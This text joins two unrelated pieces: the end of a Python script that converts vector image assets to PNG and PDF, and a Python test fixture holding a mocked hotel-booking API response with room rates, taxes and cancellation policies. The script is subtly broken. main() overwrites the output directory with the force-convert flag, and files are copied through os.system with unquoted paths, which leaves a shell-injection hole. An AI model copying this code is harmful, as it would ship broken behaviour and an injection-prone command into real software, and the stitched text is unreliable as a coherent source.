transparent_color = transparent_color.replace(transparent_color_id, "").strip(" \t\n\r")
return (int(resolution_parts[0]), int(resolution_parts[1])), transparent_color
def convert(self):
self.input_dir = self.input_dir.rstrip('\\/')
self.output_dir = self.output_dir.rstrip('\\/')
self.input_dir = os.path.expandvars(os.path.expanduser(self.input_dir))
self.output_dir = os.path.expandvars(os.path.expanduser(self.output_dir))
logging.info("Converting vector files from {0} to {1}".format(self.input_dir, self.output_dir))
temp_file = os.path.join(self.output_dir, ".basset_temp")
if os.path.isfile(temp_file):
with open(temp_file, "r") as data_file:
self.converted_files_hashes = json.load(data_file)
self.check_if_input_dir_contains_vector_assets()
self.check_if_input_dir_contains_xcassets()
converted_files_count = 0
for original_base_path, subdirectories, files in os.walk(self.input_dir):
for filename in files:
if "." in filename and filename[0] is not ".":
basename = filename.split(".")[0]
extension = filename.split(".")[1].lower()
logging.info("selecting file0: " + basename + ", extension: " + extension)
if extension in Converter.allowed_image_types():
new_base_path = original_base_path.replace(self.input_dir, self.output_dir)
if not os.path.exists(new_base_path):
os.makedirs(new_base_path)
original_full_path = os.path.join(original_base_path, filename)
logging.info("selecting file: " + filename + ", extension: " + extension)
if extension == "pdf":
destination_templates = [(1, ".pdf", False)]
else:
destination_templates = [(1, ".png", True)]
if extension != "png":
destination_templates.append((2, "@2x.png", True))
destination_templates.append((3, "@3x.png", True))
selected_destination_templates = []
for template in destination_templates:
destination_path = os.path.join(new_base_path, basename + template[1])
if self.check_if_file_needs_reconverting(original_full_path, destination_path):
selected_destination_templates.append(template)
if len(selected_destination_templates) > 0:
try:
original_size, transparent_color = Converter.get_image_metadata(original_full_path)
for template in selected_destination_templates:
new_image_size = (original_size[0] * template[0], original_size[1] * template[0])
destination_path = os.path.join(new_base_path, basename + template[1])
if template[2]:
self.convert_single_file(original_full_path, destination_path, new_image_size,
template[0], transparent_color)
logging.info("Converted {0} to {1}".format(original_full_path, destination_path))
else:
os.system("cp {0} {1}".format(original_full_path, destination_path))
logging.info("Copied {0} to {1}".format(original_full_path, destination_path))
converted_files_count += 1
except subprocess.CalledProcessError as error:
logging.error("Error while processing {0}: {1}".format(original_full_path, error))
if converted_files_count > 0:
with open(temp_file, "w+") as data_file:
json.dump(self.converted_files_hashes, data_file, indent=1)
logging.info("Images conversion finished. Processed " + str(converted_files_count) + " images")
def check_if_input_dir_contains_xcassets(self):
for original_base_path, subdirectories, files in os.walk(self.input_dir):
if original_base_path.endswith(".imageset"):
raise AssetsDirContainsImagesetDirectoryException(original_base_path, self.input_dir)
def check_if_input_dir_contains_vector_assets(self):
directories_with_vector_files = {}
if not os.path.isdir(self.input_dir):
for path, subdirectories, files in os.walk(os.getcwd()):
path = os.path.relpath(path, os.getcwd())
for filename in files:
if "." in filename and filename[0] is not ".":
extension = filename.split(".")[1]
if extension.lower() in Converter.allowed_image_types():
top_dir_in_path = path.split(os.sep)[0]
if top_dir_in_path in directories_with_vector_files:
directories_with_vector_files[top_dir_in_path] += 1
else:
directories_with_vector_files[top_dir_in_path] = 1
if directories_with_vector_files is not None:
max_vector_files_count = -1
directory_with_max_vector_files = None
for path in directories_with_vector_files.keys():
if not path.endswith(".xcassets"):
if directories_with_vector_files[path] > max_vector_files_count:
max_vector_files_count = directories_with_vector_files[path]
directory_with_max_vector_files = path
raise AssetsDirNotFoundException(directory_with_max_vector_files)
def main(args_to_parse):
parser = argparse.ArgumentParser(description='Converts raw assets to proper PNG(s).')
parser.add_argument('-i', '--input_dir', default="./Assets", help='directory with raw assets')
parser.add_argument('-f', '--force_convert', default="False",
help='should regenerate assets even when they were generated before')
parser.add_argument('-o', '--output_dir', default="./GeneratedAssets",
help='directory where generated PNG(s) will be stored')
parsed_args = parser.parse_args(args_to_parse)
converter = Converter()
converter.input_dir = parsed_args.input_dir
converter.output_dir = parsed_args.output_dir
converter.output_dir = parsed_args.force_convert
converter.convert()
if __name__ == '__main__':
args = sys.argv[1:]
main(args)
|
b2b_hotel_page_response = {
"debug": {
"b2b_request": {
"checkin": "2020-08-05",
"checkout": "2020-08-06",
"currency": None,
"residency": "ru",
"timeout": None,
"language": "ru",
"guests": [{"adults": 1, "children": []}],
"upsells": {
"early_checkin": {"time": "2020-08-05T10:00:00"},
"late_checkout": {"time": "2020-08-06T15:00:00"},
"only_eclc": True,
},
"id": "test_hotel",
},
"key_id": 1,
"validation_error": None,
},
"error": None,
"status": "ok",
"data": {
"hotels": [
{
"id": "test_hotel",
"rates": [
{
"daily_prices": ["97.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "97.90",
"show_amount": "97.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "16.32",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "97.90",
"amount_show": "97.90",
"commission_info": {
"show": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "20.00",
"show_price": "20.00",
"commission_info": {
"show": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "20.00",
"show_price": "20.00",
"commission_info": {
"show": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Standard (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-cfcbed18-bd30-5299-8484-84324c28a77b",
},
{
"daily_prices": ["97.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "97.90",
"show_amount": "97.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "16.32",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "97.90",
"amount_show": "97.90",
"commission_info": {
"show": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "20.00",
"show_price": "20.00",
"commission_info": {
"show": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "20.00",
"show_price": "20.00",
"commission_info": {
"show": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "20.00",
"amount_net": "20.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "98.00",
"amount_net": "97.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Standard (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-1f3fd417-7765-5653-915a-300ce68f9560",
},
{
"daily_prices": ["144.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "144.90",
"show_amount": "144.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "24.15",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "144.90",
"amount_show": "144.90",
"commission_info": {
"show": {
"amount_gross": "144.90",
"amount_net": "144.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "144.90",
"amount_net": "144.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "6.19",
},
"perks": {
"early_checkin": [
{
"charge_price": "29.00",
"show_price": "29.00",
"commission_info": {
"show": {
"amount_gross": "29.00",
"amount_net": "29.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "29.00",
"amount_net": "29.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "29.00",
"show_price": "29.00",
"commission_info": {
"show": {
"amount_gross": "29.00",
"amount_net": "29.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "29.00",
"amount_net": "29.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "144.90",
"amount_net": "144.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "144.90",
"amount_net": "144.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Standard (двуспальная кровать) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 981,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "31.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "123.96",
"currency_code": "PLN",
},
"book_hash": "h-eca4e776-f44c-5716-8d3c-4d9d749e937c",
},
{
"daily_prices": ["160.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "160.90",
"show_amount": "160.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "26.82",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "160.90",
"amount_show": "160.90",
"commission_info": {
"show": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "33.00",
"show_price": "33.00",
"commission_info": {
"show": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "33.00",
"show_price": "33.00",
"commission_info": {
"show": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Business (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-f4bb3906-9fcb-5bb5-a5e0-f19a40a7194c",
},
{
"daily_prices": ["160.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "160.90",
"show_amount": "160.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "26.82",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "160.90",
"amount_show": "160.90",
"commission_info": {
"show": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "33.00",
"show_price": "33.00",
"commission_info": {
"show": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "33.00",
"show_price": "33.00",
"commission_info": {
"show": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "33.00",
"amount_net": "33.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "161.00",
"amount_net": "160.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Business (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-b415f7bc-c335-584a-a5eb-4969f78cf4aa",
},
{
"daily_prices": ["199.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "199.90",
"show_amount": "199.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "33.32",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "199.90",
"amount_show": "199.90",
"commission_info": {
"show": {
"amount_gross": "199.90",
"amount_net": "199.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "199.90",
"amount_net": "199.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "8.54",
},
"perks": {
"early_checkin": [
{
"charge_price": "40.00",
"show_price": "40.00",
"commission_info": {
"show": {
"amount_gross": "40.00",
"amount_net": "40.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "40.00",
"amount_net": "40.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "40.00",
"show_price": "40.00",
"commission_info": {
"show": {
"amount_gross": "40.00",
"amount_net": "40.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "40.00",
"amount_net": "40.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "199.90",
"amount_net": "199.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "199.90",
"amount_net": "199.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Superior (двуспальная кровать) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 312,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "43.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "171.62",
"currency_code": "PLN",
},
"book_hash": "h-f245d0a4-fbaf-59cc-86f5-69c3a54fc06d",
},
{
"daily_prices": ["231.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "231.90",
"show_amount": "231.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "38.65",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "231.90",
"amount_show": "231.90",
"commission_info": {
"show": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "47.00",
"show_price": "47.00",
"commission_info": {
"show": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "47.00",
"show_price": "47.00",
"commission_info": {
"show": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный полулюкс (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-e3a39df7-ff05-5e9d-a65c-9b3957b7ce27",
},
{
"daily_prices": ["231.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "231.90",
"show_amount": "231.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "38.65",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "231.90",
"amount_show": "231.90",
"commission_info": {
"show": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "47.00",
"show_price": "47.00",
"commission_info": {
"show": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "47.00",
"show_price": "47.00",
"commission_info": {
"show": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный полулюкс (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-5f35bd1d-2f03-593d-9287-8c579f7da8a9",
},
{
"daily_prices": ["238.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "238.90",
"show_amount": "238.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "39.82",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "238.90",
"amount_show": "238.90",
"commission_info": {
"show": {
"amount_gross": "238.90",
"amount_net": "238.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "238.90",
"amount_net": "238.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "10.20",
},
"perks": {
"early_checkin": [
{
"charge_price": "48.00",
"show_price": "48.00",
"commission_info": {
"show": {
"amount_gross": "48.00",
"amount_net": "48.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "48.00",
"amount_net": "48.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "48.00",
"show_price": "48.00",
"commission_info": {
"show": {
"amount_gross": "48.00",
"amount_net": "48.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "48.00",
"amount_net": "48.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "238.90",
"amount_net": "238.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "238.90",
"amount_net": "238.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Business (двуспальная кровать) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 117,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "52.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "204.99",
"currency_code": "PLN",
},
"book_hash": "h-fa54d921-ee14-5618-a175-adb6c944ba6b",
},
{
"daily_prices": ["269.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "269.90",
"show_amount": "269.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "44.98",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "269.90",
"amount_show": "269.90",
"commission_info": {
"show": {
"amount_gross": "270.00",
"amount_net": "269.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "270.00",
"amount_net": "269.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "54.00",
"show_price": "54.00",
"commission_info": {
"show": {
"amount_gross": "54.00",
"amount_net": "54.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "54.00",
"amount_net": "54.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "54.00",
"show_price": "54.00",
"commission_info": {
"show": {
"amount_gross": "54.00",
"amount_net": "54.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "54.00",
"amount_net": "54.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "270.00",
"amount_net": "269.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "270.00",
"amount_net": "269.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 5,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
